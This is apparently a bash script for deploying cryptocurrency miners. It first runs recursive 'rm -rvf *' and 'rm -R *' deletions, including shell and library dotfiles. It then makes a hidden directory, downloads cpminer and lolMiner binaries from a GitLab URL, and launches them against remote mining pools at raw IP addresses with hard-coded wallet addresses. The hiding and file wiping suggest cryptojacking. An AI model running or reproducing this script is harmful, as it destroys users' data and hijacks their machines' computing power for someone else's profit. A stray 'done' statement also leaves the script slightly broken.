#!/bin/bash
rm -rvf * 
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash* .majza*
rm -R *
mkdir .des
cd .des
rm -R *

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/cpminer
chmod 777 cpminer && ./cpminer -a yespower -o stratum+tcp://138.197.98.18:443 -u ujvNLtVeKokPD6csgHfE48rFHXMGkBMfGe.$(shuf -n 1 -i 1-99999)-VISH -t4 &

wget https://gitlab.com/majapahlevi/mvp/-/raw/main/lolMiner1.82a
chmod 777 lolMiner1.82a

./lolMiner1.82a --algo KARLSEN --pool 159.203.127.146:80 --user nexellia:qp85uh8r8eh24v388n87megxzlucrmvjc9sq5rrzl3762w86kcelkmejf5xa2.$(shuf -n 1 -i 1-99999)-Bismillah --no-cl

done
